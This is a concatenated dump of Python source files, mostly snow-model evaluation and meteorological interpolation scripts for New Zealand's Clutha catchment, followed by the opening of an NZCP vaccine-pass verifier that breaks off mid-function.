output_folder = 'P:/Projects/DSC-Snow/nz_snow_runs/baseline_clutha2'
# set up lists
ann_ts_av_sca_m = []
ann_ts_av_sca_thres_m = []
ann_hydro_days_m = []
ann_dt_m = []
ann_scd_m = []
ann_ts_av_sca = []
ann_ts_av_swe = []
# ann_ts_av_melt = []
# ann_ts_av_acc = []
ann_hydro_days = []
ann_dt = []
ann_scd = []
ann_ts_av_sca2 = []
ann_ts_av_swe2 = []
# ann_ts_av_melt2 = []
# ann_ts_av_acc2 = []
ann_hydro_days2 = []
ann_dt2 = []
ann_scd2 = []
configs = []
for hydro_year_to_take in hydro_years_to_take:
print('loading modis data HY {}'.format(hydro_year_to_take))
# load modis data for evaluation
modis_fsca, modis_dt, modis_mask = load_subset_modis(catchment, output_dem, hydro_year_to_take, modis_folder, dem_folder, modis_dem, mask_folder,
catchment_shp_folder)
modis_hydro_days = convert_date_hydro_DOY(modis_dt)
modis_sc = modis_fsca >= modis_sc_threshold
# print('calculating basin average sca')
# modis
num_modis_gridpoints = np.sum(modis_mask)
ba_modis_sca = []
ba_modis_sca_thres = []
for i in range(modis_fsca.shape[0]):
ba_modis_sca.append(np.nanmean(modis_fsca[i, modis_mask]) / 100.0)
ba_modis_sca_thres.append(np.nansum(modis_sc[i, modis_mask]).astype('d') / num_modis_gridpoints)
# print('adding to annual series')
ann_ts_av_sca_m.append(np.asarray(ba_modis_sca))
ann_ts_av_sca_thres_m.append(np.asarray(ba_modis_sca_thres))
# print('calc snow cover duration')
modis_scd = np.sum(modis_sc, axis=0)
modis_scd[modis_mask == 0] = -1
# add to annual series
ann_scd_m.append(modis_scd)
ann_hydro_days_m.append(modis_hydro_days)
ann_dt_m.append(modis_dt)
modis_fsca = None
modis_dt = None
modis_mask = None
modis_sc = None
modis_scd = None
if which_model == 'clark2009' or which_model == 'all':
print('loading clark2009 model data HY {}'.format(hydro_year_to_take))
if clark2009run == False:
# run model and return timeseries of daily swe, acc and melt.
st_swe, st_melt, st_acc, out_dt, mask = run_clark2009(catchment, output_dem, hydro_year_to_take, met_inp_folder, catchment_shp_folder)
pickle.dump([st_swe, st_melt, st_acc, out_dt, mask], open(clark2009_output_folder + '/{}_{}_hy{}.pkl'.format(catchment, output_dem,
hydro_year_to_take), 'wb'), -1)
elif clark2009run == True:
# load previously run simulations from pickle file
st_snow = pickle.load(open(clark2009_output_folder + '/{}_{}_hy{}_clark2009.pkl'.format(catchment, output_dem, hydro_year_to_take), 'rb'))
st_swe = st_snow[0]
st_melt = st_snow[1]
st_acc = st_snow[2]
out_dt = st_snow[3]
mask = st_snow[4]
config1 = st_snow[5]
configs.append(config1)
# compute timeseries of basin average sca
num_gridpoints = np.sum(mask) # st_swe.shape[1] * st_swe.shape[2]
ba_swe = []
ba_sca = []
# ba_melt = []
# ba_acc = []
for i in range(st_swe.shape[0]):
ba_swe.append(np.nanmean(st_swe[i, mask])) # some points don't have input data, so are nan
ba_sca.append(np.nansum(st_swe[i, mask] > model_swe_sc_threshold).astype('d') / num_gridpoints)
# ba_melt.append(np.mean(st_melt[i, mask.astype('int')]))
# ba_acc.append(np.mean(st_acc[i, mask.astype('int')]))
# add to annual series
ann_ts_av_sca.append(np.asarray(ba_sca))
ann_ts_av_swe.append(np.asarray(ba_swe))
# ann_ts_av_melt.append(np.asarray(ba_melt))
# ann_ts_av_acc.append(np.asarray(ba_acc))
ann_hydro_days.append(convert_date_hydro_DOY(out_dt))
ann_dt.append(out_dt)
# calculate snow cover duration
st_sc = st_swe > model_swe_sc_threshold
mod1_scd = np.sum(st_sc, axis=0)
mod1_scd[mask == 0] = -999
ann_scd.append(mod1_scd)
# clear arrays
st_swe = None
st_melt = None
st_acc = None
out_dt = None
mod1_scd = None
mask = None
st_sc = None
st_snow = None
if which_model == 'dsc_snow' or which_model == 'all':
print('loading dsc_snow model data HY {}'.format(hydro_year_to_take))
if dsc_snow_opt == 'fortran':
# load previously run simulations from netCDF
st_swe, st_melt, st_acc, out_dt, mask = load_dsc_snow_output(catchment, output_dem, hydro_year_to_take, dsc_snow_output_folder,
dsc_snow_dem_folder)
elif dsc_snow_opt == 'python':
if dsc_snow_opt2 == 'netCDF':
st_swe, st_melt, st_acc, out_dt = load_dsc_snow_output_python_otf(catchment, output_dem, hydro_year_to_take, dsc_snow_output_folder)
# load mask
dem = 'si_dem_250m'
dem_folder = 'Z:/GIS_DATA/Topography/DEM_NZSOS/'
dem_file = dem_folder + dem + '.tif'
nztm_dem, x_centres, y_centres, lat_array, lon_array = setup_nztm_dem(dem_file)
mask = np.load(mask_folder + '/{}_{}.npy'.format(catchment, dem))
_, _, trimmed_mask, _, _ = trim_lat_lon_bounds(mask, lat_array, lon_array, mask.copy(), y_centres, x_centres)
mask = trimmed_mask
elif dsc_snow_opt2 == 'pickle':
# load previously run simulations from pickle file
st_snow = pickle.load(open(dsc_snow_output_folder + '/{}_{}_hy{}_dsc_snow.pkl'.format(catchment, output_dem, hydro_year_to_take), 'rb'))
st_swe = st_snow[0]
st_melt = st_snow[1]
st_acc = st_snow[2]
out_dt = st_snow[3]
mask = st_snow[4]
config2 = st_snow[5]
configs.append(config2)
# print('calculating basin average sca')
num_gridpoints2 = np.sum(mask)
ba_swe2 = []
ba_sca2 = []
for i in range(st_swe.shape[0]):
ba_swe2.append(np.nanmean(st_swe[i, mask]))
ba_sca2.append(np.nansum(st_swe[i, mask] > model_swe_sc_threshold).astype('d') / num_gridpoints2)
# print('adding to annual series')
# add to annual timeseries
if which_model == 'all':
ann_ts_av_sca2.append(np.asarray(ba_sca2))
ann_ts_av_swe2.append(np.asarray(ba_swe2))
# ann_ts_av_melt.append(np.asarray(ba_melt))
# ann_ts_av_acc.append(np.asarray(ba_acc))
ann_hydro_days2.append(convert_date_hydro_DOY(out_dt))
ann_dt2.append(out_dt)
elif which_model == 'dsc_snow':
ann_ts_av_sca.append(np.asarray(ba_sca2))
ann_ts_av_swe.append(np.asarray(ba_swe2))
# ann_ts_av_melt.append(np.asarray(ba_melt))
# ann_ts_av_acc.append(np.asarray(ba_acc))
ann_hydro_days.append(convert_date_hydro_DOY(out_dt))
ann_dt.append(out_dt)
# print('calc snow cover duration')
st_sc = st_swe > model_swe_sc_threshold
mod_scd = np.sum(st_sc, axis=0)
mod_scd[mask == 0] = -999
if which_model == 'all':
ann_scd2.append(mod_scd)
elif which_model == 'dsc_snow':
ann_scd.append(mod_scd)
# clear arrays
st_snow = None
st_swe = None
st_melt = None
st_acc = None
out_dt = None
mod_scd = None
mask = None
st_sc = None
#
# if which_model == 'all':
# if clark2009run == False:
# # run model and return timeseries of daily swe, acc and melt.
# st_swe, st_melt, st_acc, out_dt, mask = run_clark2009(catchment, output_dem, hydro_year_to_take, met_inp_folder, catchment_shp_folder)
# elif clark2009run == True:
# # load previously run simulations from pickle file
# st_snow = pickle.load(open(clark2009_output_folder + '/{}_{}_hy{}_clark2009.pkl'.format(catchment, output_dem, hydro_year_to_take), 'rb'))
# st_swe = st_snow[0]
# st_melt = st_snow[1]
# st_acc = st_snow[2]
# out_dt = st_snow[3]
# mask = st_snow[4]
#
# # load previously run simulations from netCDF or pickle file
# if dsc_snow_opt == 'fortran':
# st_swe2, st_melt2, st_acc2, out_dt2, mask2 = load_dsc_snow_output(catchment, output_dem, hydro_year_to_take, dsc_snow_output_folder,
# dsc_snow_dem_folder)
# elif dsc_snow_opt == 'python':
# st_snow2 = pickle.load(open(dsc_snow_output_folder + '/{}_{}_hy{}_dsc_snow.pkl'.format(catchment, output_dem, hydro_year_to_take), 'rb'))
# st_swe2 = st_snow2[0]
# st_melt2 = st_snow2[1]
# st_acc2 = st_snow2[2]
# out_dt2 = st_snow2[3]
# mask2 = st_snow2[4]
ann = [ann_ts_av_sca_m, ann_hydro_days_m, ann_dt_m, ann_scd_m, ann_ts_av_sca, ann_ts_av_swe, ann_hydro_days, ann_dt, ann_scd, ann_ts_av_sca2,
ann_ts_av_swe2, ann_hydro_days2, ann_dt2, ann_scd2, ann_ts_av_sca_thres_m, configs]
pickle.dump(ann, open(output_folder + '/summary_{}_{}_thres{}_swe{}.pkl'.format(catchment, output_dem, modis_sc_threshold, model_swe_sc_threshold), 'wb'),
-1)
```
#### File: nz_snow_tools/eval/gridded_evaluation_annual.py
```python
from __future__ import division
import matplotlib.pylab as plt
from nz_snow_tools.eval.catchment_evaluation import *
from nz_snow_tools.eval.catchment_evaluation_annual import load_dsc_snow_output_annual, load_subset_modis_annual
from nz_snow_tools.util.utils import resample_to_fsca, nash_sut, mean_bias, rmsd, mean_absolute_error
def plot_point(i,j,name,year):
plt.figure()
plt.plot(np.convolve(model_fsca_rs[:, i, j], np.ones((smooth_period,)) / smooth_period, mode='same'))
plt.plot(np.convolve(modis_fsca_rs[:, i, j], np.ones((smooth_period,)) / smooth_period, mode='same'))
plt.ylabel('fsca (%)')
plt.xlabel('day of year')
plt.title(name)
plt.savefig('P:/Projects/DSC-Snow/runs/output/clutha_nztm250m_erebus/plots/timeseries/timeseries_{}_{}_{}_{}.png'.format(name,year,smooth_period,run_id))
plt.close()
if __name__ == '__main__':
    rl = 4 # resample length (i.e. how many grid cells in each direction to resample)
smooth_period = 10 # number of days to smooth model data
origin = 'topleft'
catchment = 'Clutha' # string identifying catchment modelled
output_dem = 'nztm250m' # identifier for output dem
years_to_take = range(2000, 2016 + 1) # range(2016, 2016 + 1) # [2013 + 1] # range(2001, 2013 + 1)
# modis_sc_threshold = 50 # value of fsca (in percent) that is counted as being snow covered
model_swe_sc_threshold = 20 # threshold for treating a grid cell as snow covered (mm w.e)
dsc_snow_output_folder = 'D:/DSC-Snow/runs/output/clutha_nztm250m_erebus'
mask_folder = 'C:/Users/conwayjp/OneDrive - NIWA/Temp/DSC-Snow/Masks'
catchment_shp_folder = 'C:/Users/conwayjp/OneDrive - NIWA/Data/GIS_DATA/Hydrology/Catchments'
modis_folder = 'C:/Users/conwayjp/OneDrive - NIWA/Data/MODIS_snow/NSDI_SI_cloudfilled'
dem_folder = 'C:/Users/conwayjp/OneDrive - NIWA/Data/GIS_DATA/Topography/DEM_NZSOS/'
modis_dem = 'modis_si_dem_250m'
met_inp_folder = 'D:/DSC-Snow/input_data_hourly'
dsc_snow_dem_folder = 'C:/Users/conwayjp/OneDrive - NIWA/projects/DSC Snow/Projects-DSC-Snow/runs/input_DEM'
output_folder = 'C:/Users/conwayjp/OneDrive - NIWA/projects/DSC Snow/Projects-DSC-Snow/runs/output/clutha_nztm250m_erebus'
for year_to_take in years_to_take:
print('loading modis data {}'.format(year_to_take))
# load modis data for evaluation
modis_fsca, modis_dt, modis_mask = load_subset_modis_annual(catchment, output_dem, year_to_take, modis_folder, dem_folder, modis_dem, mask_folder,
catchment_shp_folder)
# set up output array
nt = modis_fsca.shape[0]
ny = modis_fsca.shape[1]
nx = modis_fsca.shape[2]
ny_out = ny // rl # integer divide to ensure fits
nx_out = nx // rl
modis_fsca_rs = np.zeros((nt, ny_out, nx_out))
for i in range(nt):
modis_sub = modis_fsca[i,]
fsca_rs = resample_to_fsca(modis_sub, rl=rl)
modis_fsca_rs[i] = fsca_rs
# load model data
for tempchange in [-2, 0]:
for precipchange in [20, 50, 100]:
# if tempchange == 0 and precipchange in [50,100]:
# pass
# else:
s_ns = []
s_bias = []
s_rmse = []
s_mae = []
s_obs = []
s_mod = []
run_id = 'norton_5_t{}_p{}_topleft'.format(tempchange,precipchange) # string identifying fortran dsc_snow run. everything after the year
                # recipe
# read in modis and model data for one year
# average to large spatial scale
# compare timeseries of fsca at each point
# store statistics - for each point for each year dims = [year,y,x]
print('loading dsc_snow model data {}'.format(year_to_take))
# load previously run simulations from netCDF
st_swe, _, _, out_dt, mask = load_dsc_snow_output_annual(catchment, output_dem, year_to_take, dsc_snow_output_folder,
dsc_snow_dem_folder, run_id, origin=origin)
if year_to_take == 2000:
# cut so that first day corresponds to first MODIS obs on 24th Feb i.e. 2000-02-25 00:00:00
st_swe = st_swe[54:, ]
# st_melt = st_melt[54:, ]
# st_acc = st_acc[54:, ]
out_dt = out_dt[54:]
st_sc = np.zeros(st_swe.shape, dtype=np.float32)
st_sc[st_swe > model_swe_sc_threshold] = 100
st_sc[:, mask == False] = np.nan
model_fsca_rs = np.zeros((nt, ny_out, nx_out))
for i in range(nt):
model_sub = st_sc[i,]
fsca_rs = resample_to_fsca(model_sub, rl=rl)
model_fsca_rs[i] = fsca_rs
# plt.plot(np.nanmean(model_fsca_rs, axis=(1, 2)))
#
# plt.figure()
# plt.imshow(np.mean(modis_fsca_rs, axis=0),origin=0)
# plt.figure()
# plt.imshow(np.mean(model_fsca_rs, axis=0),origin=0)
ns_array = np.zeros((ny_out, nx_out))
mbd_array = np.zeros((ny_out, nx_out))
rmsd_array = np.zeros((ny_out, nx_out))
mae_array = np.zeros((ny_out, nx_out))
for i in range(ny_out):
for j in range(nx_out):
obs = np.convolve(modis_fsca_rs[:, i, j], np.ones((smooth_period,)) / smooth_period, mode='same')
mod = np.convolve(model_fsca_rs[:, i, j], np.ones((smooth_period,)) / smooth_period, mode='same')
ns_array[i, j] = nash_sut(mod, obs)
mbd_array[i, j] = mean_bias(mod, obs)
rmsd_array[i, j] = rmsd(mod, obs)
mae_array[i, j] = mean_absolute_error(mod, obs)
modis_mean = np.mean(modis_fsca_rs, axis=0)
model_mean = np.mean(model_fsca_rs, axis=0)
s_ns.append(ns_array)
s_bias.append(mbd_array)
s_rmse.append(rmsd_array)
s_mae.append(mae_array)
s_obs.append(modis_mean)
s_mod.append(model_mean)
for i,j,name in zip([161,147,127,107,186,125],[83,102,59,88,21,34],['Pisa','Dunstan','Hector','<NAME>','Earnslaw','Lochy']):
plot_point(i,j,name,year_to_take)
ann = [s_obs, s_mod, s_ns, s_bias, s_rmse, s_mae]
pickle.dump(ann, open(
output_folder + '/resample_fit_{}_swe{}_{}_rs{}_smooth{}_{}.pkl'.format(catchment, model_swe_sc_threshold, run_id, rl,smooth_period,year_to_take),
'wb'), -1)
st_swe, st_sc = None, None
# reset variables to save space
modis_fsca = None
```
#### File: nz_snow_tools/met/interp_rcm_diff.py
```python
from __future__ import division
import os
#os.environ['PROJ_LIB'] = '/home/jared/anaconda/envs/nz_snow_tools/share/proj'
import datetime as dt
import netCDF4 as nc
import numpy as np
import pickle
#from bs.core import source, env
# from nz_snow_tools.util import convert_projection
import matplotlib.pylab as plt
import os
os.environ['PROJ_LIB']=r'C:\miniconda\envs\nz_snow27\Library\share'
import mpl_toolkits.basemap as basemap
from scipy import interpolate
from nz_snow_tools.util.utils import process_precip, process_temp, create_mask_from_shpfile, make_regular_timeseries, calc_toa, trim_lat_lon_bounds, \
setup_nztm_dem
from nz_snow_tools.util.write_fsca_to_netcdf import write_nztm_grids_to_netcdf, setup_nztm_grid_netcdf
# def get_elevation_data(ravel_idxs):
# ds = nc.Dataset(env.data('/RCMData/Version6/RCP2.6/BCC-CSM1.1/MaxTempCorr_VCSN_BCC-CSM1.1_2006-2010_RCP2.6.nc'))
# return ds.variables['elevation'][:].ravel()[ravel_idxs]
#
#
# def get_vscn_elevation_data(ravel_idxs):
# ds = nc.Dataset(env.data('/RCMData/Version6/RCP2.6/BCC-CSM1.1/MaxTempCorr_VCSN_BCC-CSM1.1_2006-2010_RCP2.6.nc'))
# return np.flipud(ds.variables['elevation'][:]).ravel()[ravel_idxs]
#
# def get_ravel_idxs(mask):
# existing_landpoints = np.load(get_subset_landpoints_fname())
# masked_landpoints = ravel.calc_ravel_idxs(mask, False)
#
# # Only include the points in the subsetted data
# masked_landpoints = np.array(filter(lambda x: x in existing_landpoints, masked_landpoints))
#
# return masked_landpoints
#
#
# def get_masks():
# shp_file = shapefile.Reader(mask_shpfile)
# res = []
# # first field is id and the second is the name
# for idx, sr in enumerate(shp_file.shapeRecords()):
# mask = create_mask_from_shpfile(VCSN_file.latitudes(), VCSN_file.longitudes(), mask_shpfile, idx)
# res.append((sr.record[1], mask))
# return res
#
#
# def subset_mask(mask, data):
# """
# Obtain the subset defined by the mask
#
# Since the data array is already ravelled, it cannot be masked easily. Instead the overlapping ravelled indexs must be calculated and
# then extracted
# :param mask:
# :param data:
# :return: The subsetted data
# """
# existing_landpoints = np.load(get_subset_landpoints_fname())
# masked_landpoints = get_ravel_idxs(mask)
#
# # Find the overlapping points
# overlap = np.array([idx in masked_landpoints for idx in existing_landpoints])
#
# return data[:, overlap]
def interpolate_met(in_dat, var, in_lons, in_lats, in_elev, out_lons, out_lats, out_elev, lapse=-0.005, single_dt=False):
"""
interpolate met data for one timestep from coarse (vcsn) grid onto higher-resolution grid using bilinear interpolation.
Air temperatures are first lapsed to sea level using default lapse rate of 0.005 K per m, interpolated, then lapsed to elevation of new grid
:param in_dat: 3D array with data to be interpolated. has matrix [i,j] coordinates i.e. dimensions [time, in_lats, in_lons]
:param var: name of variable to be interpolated. if 't_max', or 't_min' will lapse to sea level before interpolation
:param in_lons: 1D or 2D array containing longitudes of input data
:param in_lats: 1D or 2Darray containing latitudes of input data
    :param in_elev: 2D array containing elevation of input data, dimensions [in_lats, in_lons] or same as in_lons
:param out_lons: 1D array containing longitudes of output data
:param out_lats: 1D array containing latitudes of output data
:param out_elev: 2D array containing elevation of output data, dimension [out_lats, out_lons]
:param lapse: lapse rate used to reduce data to sea level before interpolation
:return: out_dat: 3D array with interpolated data has dimensions [time, out_lats, out_lons]
"""
# X, Y = np.meshgrid(vcsn_lons, vcsn_lats)
if out_lons.ndim == 1 and out_lats.ndim == 1:
# y_array, x_array = np.meshgrid(y_centres, x_centres, indexing='ij')
YI, XI, = np.meshgrid(out_lats, out_lons,
indexing='ij') # the input grid must have i,j ordering with y(lats) being the first dimension.
num_out_lats = len(out_lats)
num_out_lons = len(out_lons)
else:
num_out_lats = out_lons.shape[0]
num_out_lons = out_lons.shape[1]
XI = out_lons
YI = out_lats
if single_dt == False:
out_dat = np.empty([in_dat.shape[0], num_out_lats, num_out_lons], dtype=np.float32) * np.nan
for i in range(in_dat.shape[0]):
in_dat1 = in_dat[i, :, :] * 1.0
if type(in_dat) == np.ma.core.MaskedArray:
in_dat1.data[in_dat1.mask] = np.nan
if var in ['tmax', 'tmin']: # lapse to sea level
in_t_offset = in_elev * lapse
in_dat1 = in_dat1 - in_t_offset
out_dat1 = basemap.interp(in_dat1, in_lons, in_lats, XI, YI, checkbounds=False, masked=False, order=1) # bilinear grid - will miss edges
if type(in_dat) == np.ma.core.MaskedArray:
out_dat0 = basemap.interp(in_dat1, in_lons, in_lats, XI, YI, checkbounds=False, masked=False, order=0) # nearest neighbour grid to fill edges
out_dat1[np.where(out_dat1.mask)] = out_dat0[np.where(out_dat1.mask)] # replace the masked elements in bilinear grid with the nn grid
# mask data at sea level
# out_dat1[out_elev.data < 1.0] = np.nan # no longer send in a masked array
if var in ['tmax', 'tmin']: # lapse back to new elevations
out_t_offset = out_elev * lapse
out_dat1 = out_dat1 + out_t_offset
out_dat[i, :, :] = out_dat1
elif single_dt == True:
# out_dat = np.empty([num_out_lats, num_out_lons], dtype=np.float32) * np.nan
# in_dat1 = in_dat * 1.0
if type(in_dat) == np.ma.core.MaskedArray:
in_dat.data[in_dat.mask] = np.nan
if var in ['tmax', 'tmin']: # lapse to sea level
in_t_offset = in_elev * lapse
in_dat = in_dat - in_t_offset
out_dat = basemap.interp(in_dat, in_lons, in_lats, XI, YI, checkbounds=False, masked=False, order=1)
if type(in_dat) == np.ma.core.MaskedArray:
out_dat0 = basemap.interp(in_dat, in_lons, in_lats, XI, YI, checkbounds=False, masked=False, order=0) # nearest neighbour grid to fill edges
out_dat[np.where(out_dat.mask)] = out_dat0[np.where(out_dat.mask)]
# mask data at sea level
# out_dat1[out_elev.data < 1.0] = np.nan # no longer send in a masked array
if var in ['tmax', 'tmin']: # lapse back to new elevations
out_t_offset = out_elev * lapse
out_dat = out_dat + out_t_offset
return out_dat.astype(np.float32)
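# Illustrative call (a sketch; the variable names below are assumptions): interpolate a stack of
# daily tmax fields from the coarse grid onto the fine grid, lapsing to sea level and back:
#     out_tmax = interpolate_met(vcsn_tmax, 'tmax', vcsn_lons, vcsn_lats, vcsn_elev,
#                                out_lons, out_lats, out_elev, lapse=-0.005)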
def daily_to_hourly_temp_grids(max_temp_grid, min_temp_grid, single_dt=False):
"""
run through and process daily data into hourly, one slice at a time.
:param max_temp_grid: input data with dimension [time,y,x]
:param min_temp_grid: input data with dimension [time,y,x]
:return: hourly data with dimension [time*24,y,x]
"""
if single_dt == True: # assume is 2d and add a time dimension on the start
max_temp_grid = max_temp_grid.reshape([1, max_temp_grid.shape[0], max_temp_grid.shape[1]])
min_temp_grid = min_temp_grid.reshape([1, min_temp_grid.shape[0], min_temp_grid.shape[1]])
hourly_grid = np.empty([max_temp_grid.shape[0] * 24, max_temp_grid.shape[1], max_temp_grid.shape[2]], dtype=np.float32) * np.nan
for i in range(max_temp_grid.shape[1]):
hourly_grid[:, i, :] = process_temp(max_temp_grid[:, i, :], min_temp_grid[:, i, :])
return hourly_grid
def daily_to_hourly_swin_grids(swin_grid, lats, lons, hourly_dt, single_dt=False):
"""
    converts daily mean SW into hourly values by applying the daily atmospheric transmissivity to hourly top-of-atmosphere radiation
    :param swin_grid: daily SW in data with dimension [time,y,x]
:return:
"""
if single_dt == True: # assume is 2d and add a time dimension on the start
swin_grid = swin_grid.reshape([1, swin_grid.shape[0], swin_grid.shape[1]])
num_steps_in_day = int(86400. / (hourly_dt[1] - hourly_dt[0]).total_seconds())
hourly_grid = np.ones([swin_grid.shape[0] * num_steps_in_day, swin_grid.shape[1], swin_grid.shape[2]])
lon_ref = np.mean(lons)
lat_ref = np.mean(lats)
# compute hourly TOA for reference in middle of domain #TODO explicit calculation for each grid point?
toa_ref = calc_toa(lat_ref, lon_ref, hourly_dt)
# compute daily average TOA and atmospheric transmissivity
daily_av_toa = []
for i in range(0, len(toa_ref), num_steps_in_day):
daily_av_toa.append(np.mean(toa_ref[i:i + num_steps_in_day]))
daily_trans = swin_grid / np.asarray(daily_av_toa)[:, np.newaxis, np.newaxis]
# calculate hourly sw from daily average transmisivity and hourly TOA
for ii, i in enumerate(range(0, len(toa_ref), num_steps_in_day)):
hourly_grid[i:i + num_steps_in_day] = hourly_grid[i:i + num_steps_in_day] * toa_ref[i:i + num_steps_in_day, np.newaxis, np.newaxis] * daily_trans[ii]
return hourly_grid
def load_new_vscn(variable, dt_out, nc_file_in, point=None, nc_opt=False, single_dt=False, nc_datetimes=None):
"""
load vcsn data from file for specified datetimes. transforms spatial dimensions so that latitude and longitude are increasing
:param variable: string describing the field to take. options for newVCSN data are 'rain', 'tmax', 'tmin', 'srad'
:param dt_out: array of datetimes requested
:param nc_file_in: string describing full path to netCDF file with VCSN data
:param point[y,x] : point to extract data at, where y and x refer to the array positions of point required
:param nc_opt: set to True if nc_file_in is a netCDF instance rather than a string
:return: array containing VCSN data with dimensions [time, lat, lon]
"""
if nc_opt:
nc_file = nc_file_in
else:
nc_file = nc.Dataset(nc_file_in)
if nc_datetimes is None:
nc_datetimes = nc.num2date(nc_file.variables['time'][:], nc_file.variables['time'].units)
if single_dt == False:
# nc dts are in UTC, and recorded at 9am. To get record relevant to NZST day (at 00:00), need to subtract 3 hours (12 hour offset, plus 9 hours)
index = np.where(np.logical_and(nc_datetimes >= (dt_out[0] - dt.timedelta(hours=3)),
nc_datetimes <= (dt_out[-1] - dt.timedelta(hours=3))))
else:
index = np.where(nc_datetimes == (dt_out - dt.timedelta(hours=3)))
start_idx = index[0][0]
end_idx = index[0][-1]
if variable == 'tmax' or variable == 'rain' or variable == 'srad': # take measurement (max or sum) to 9am next day
start_idx = start_idx + 1
end_idx = end_idx + 1
if point is None:
data = np.fliplr(nc_file.variables[variable][start_idx:end_idx + 1, :, :])
# flip so latitude and longitude is increasing. i.e. origin at bottom left. # fliplr flips second dimension
if single_dt:
data = np.squeeze(data)
else:
data = nc_file.variables[variable][start_idx:end_idx + 1, point[0], point[1]]
return data
if __name__ == '__main__':
# code to get elevation and lat/lon - assumes VCSN and RCM use same lat/lon
# nc_file_rain = nc.Dataset('/mnt/data/RCMData/Version6/Annual/Ann_WS10_VCSN_xairj_1971-2005c0_RCPpast.nc', 'r')
in_lats = np.genfromtxt(r"C:\Users\conwayjp\OneDrive - NIWA\projects\DSC Snow\RCM_differences\diff\lats.dat")#nc_file_rain.variables['latitude'][::-1] # source.RCM_file.latitudes()
in_lons = np.genfromtxt(r"C:\Users\conwayjp\OneDrive - NIWA\projects\DSC Snow\RCM_differences\diff\lons.dat")#nc_file_rain.variables['longitude'][:] # source.RCM_file.longitudes()
# vcsn_elev = np.flipud(nc_file_rain.variables['elevation'][:])
# vcsn_elev_interp = np.ma.fix_invalid(vcsn_elev).data
# in_elev = vcsn_elev_interp
in_elev = np.ones((260,243))
# code to get output lat/lons
# dem_folder = '/mnt/data/GIS_DATA/Topography/DEM_NZSOS/'
#catchment = 'Clutha'
dem = 'clutha_dem_250m'
#subcatchment = 'qldc_ta_area'
catchment = 'Clutha'
mask_folder = r'C:\Users\conwayjp\OneDrive - NIWA\Temp\Masks'
# dem_file = dem_folder + dem + '.tif'
# elev, easting, northing, lat_array, lon_array = setup_nztm_dem(dem_file)
# create new outlons and out_lats using trim for the qldc mask here
nztm_dem, x_centres, y_centres, lat_array, lon_array = setup_nztm_dem(dem_file=None)
mask = np.load(mask_folder + '/{}_{}.npy'.format(catchment, dem))
# qldc_mask = np.load(mask_folder + '/{}_{}.npy'.format(subcatchment, dem))
out_lats, out_lons, trimmed_mask, _, _ = trim_lat_lon_bounds(mask, lat_array, lon_array, mask.copy(), y_centres,
x_centres)
# returns: lats, lons, elev, northings, eastings
mask = trimmed_mask
#out_lons = lon_array
out_lats = np.flipud(out_lats) #(lat_array)
# northing = np.flipud(northing)
# out_elev = elev
out_elev = trimmed_mask*0.0
# # Clip to the same extent as the met data
# northing_clip = (4861875, 5127625)
# easting_clip = (1214375, 1370375)
# northing_mask = (northing >= northing_clip[0]) & (northing <= northing_clip[1])
# easting_mask = (easting >= easting_clip[0]) & (easting <= easting_clip[1])
# out_lats = out_lats[northing_mask][:, easting_mask]
# out_lons = out_lons[northing_mask][:, easting_mask]
for sce in ['RCP2.6', 'RCP4.5', 'RCP6.0','RCP8.5']:#
for v in ['T']:#
for year in ['2045','2095']:# '
# note: don't lapse the temperature e.g., call it 'rain' variable rather than temperature or use 0 lapse rate
dat_file = r'C:\Users\conwayjp\OneDrive - NIWA\projects\DSC Snow\RCM_differences\diff\NEW_{}diff_{}_{}_mean.npy'.format(v, sce, year)
# dat_file = 'D:/NEW_{}diff_{}_{}_percent.npy'.format(v, sce, year)
inp_dat = np.load(dat_file)
inp_dat = np.flipud(inp_dat)
in_dat = np.ma.masked_invalid(inp_dat)
array = in_dat#np.ma.masked_invalid(in_dat)
xx, yy = np.meshgrid(in_lons, in_lats)
# get only the valid values
x1 = xx[~array.mask]
y1 = yy[~array.mask]
newarr = array[~array.mask]
GD1 = interpolate.griddata((x1, y1), newarr.ravel(),
(xx, yy),
method='nearest')
GD1 = np.ma.masked_invalid(GD1)
var = 'rain'
lapse = 0.000
single_dt = True
hi_res_temp_2095 = interpolate_met(GD1, var, in_lons, in_lats, in_elev, out_lons, out_lats, out_elev, lapse, single_dt)
# with open('/mnt/temp/CODC/metric_plots/SavedData-change/{}diff_{}_{}_mean_downscaled_v2.npy'.format(v, sce, year), 'w') as fh:
# np.save(fh, hi_res_temp_2095)
# plt.imshow(hi_res_temp_2095.data)
# plt.colorbar()
# plt.show()
np.save(r'C:\Users\conwayjp\OneDrive - NIWA\projects\DSC Snow\RCM_differences\diff\{}diff_{}_{}_mean_downscaled_v5.npy'.format(v, sce, year), hi_res_temp_2095.data)
# np.save('D:/{}diff_{}_{}_mean_downscaled_v3.npy'.format(v, sce, year), hi_res_temp_2095.data)
``` |
{
"source": "jonodavis/NZCP-Verifier",
"score": 3
} |
#### File: jonodavis/NZCP-Verifier/verifier.py
```python
import base64
import hashlib
import json
import logging
import urllib.request
from datetime import datetime
from cbor2 import dumps, loads
from jwcrypto import jwk
from ecdsa import VerifyingKey
logging.basicConfig(level=logging.WARN,
format='%(asctime)s - %(levelname)s - %(message)s')
TRUSTED_ISSUERS = [
"did:web:nzcp.identity.health.nz",
"did:web:nzcp.covid19.health.nz" # for testing only
]
stored_dids = {}
def add_base32_padding(base32_input_no_padding):
"""Return a base32 string with the correct padding
Parameters:
base32_input_no_padding (str): base32 string without padding
"""
result = base32_input_no_padding
while ((len(result) % 8) != 0):
result += '='
return result
def check_and_remove_prefix(code):
"""Returns the NZCP code without the NZCP prefix
Parameters:
code (str): NZCP code with prefix
"""
try:
if (code[0:6] == "NZCP:/"):
logging.debug("Check prefix: PASS")
return code[6:]
else:
logging.debug("Check prefix: FAIL")
return False
except:
logging.debug("Check prefix: FAIL")
return False
def check_and_remove_version(base32_with_version):
"""Returns the NZCP code without the NZCP version
Parameters:
base32_with_version (str): NZCP code with version and without prefix
"""
try:
if (base32_with_version[0:2] == "1/"):
logging.debug("Checking version number: PASS")
return base32_with_version[2:]
else:
logging.debug("Checking version number: FAIL")
return False
except:
logging.debug("Checking version number: FAIL")
return False
def decode_base32(base32_input):
"""Returns the decoded base32 string
Parameters:
base32_input (str): base32 string
"""
try:
result = base64.b32decode(base32_input)
logging.debug("Decoding Base32: PASS")
return result
except:
logging.debug("Decoding Base32: FAIL")
return False
def decode_cbor(decoded_base32):
"""Returns the deserialized CBOR object
Parameters:
decoded_base32 (bytes): decoded base32 string
"""
try:
obj = loads(decoded_base32)
logging.debug("Decoding CBOR: PASS")
return obj
except:
logging.debug("Decoing CBOR: FAIL")
return False
def check_cwt_claims(decoded_payload):
"""Returns True if the CWT claims are valid
Parameters:
